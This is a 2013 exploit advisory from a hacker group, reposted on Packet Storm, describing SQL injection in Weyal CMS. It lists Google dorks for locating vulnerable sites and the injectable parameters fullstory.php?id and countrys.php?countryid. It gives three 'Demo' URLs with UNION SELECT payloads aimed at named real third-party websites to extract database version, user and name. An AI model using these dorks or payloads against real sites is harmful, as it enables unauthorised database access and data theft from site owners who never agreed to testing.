Weyal CMS suffers from a remote SQL injection vulnerability. Note that this finding has site-specific information.
83692401cd0bb507fa938e88a9e9e351a2a29d0810f21072c7eef4a2e38bdc33================================================
Weyal Cms SQL Injection Vulnerability
================================================
#############################################################################
______ __ __ __ __ __ __ #
/\ _ \/\ \__/\ \__/\ \\ \ /\ \ /'__`\ __ #
\ \ \L\ \ \ ,_\ \ ,_\ \ \\ \ ___\ \ \/'\ /\_\L\ \ _ __ /\_\ _ __ #
\ \ __ \ \ \/\ \ \/\ \ \\ \_ /'___\ \ , < \/_/_\_<_/\`'__\ \/\ \/\`'__\ #
\ \ \/\ \ \ \_\ \ \_\ \__ ,__\/\ \__/\ \ \\`\ /\ \L\ \ \ \/ __\ \ \ \ \/ #
\ \_\ \_\ \__\\ \__\\/_/\_\_/\ \____\\ \_\ \_\ \____/\ \_\/\_\\ \_\ \_\ #
\/_/\/_/\/__/ \/__/ \/_/ \/____/ \/_/\/_/\/___/ \/_/\/_/ \/_/\/_/ #
#
[+] Site: http://tools.Att4ck3r.ir #
[+] Contact: xrogue_p3rsi4n_hack3r@hotmail.com #
#############################################################################
================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork: intext:"Designed by Rohi.af"
intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
[+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi
www.[site].com/[path]/countrys.php?id=SQLi
[+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed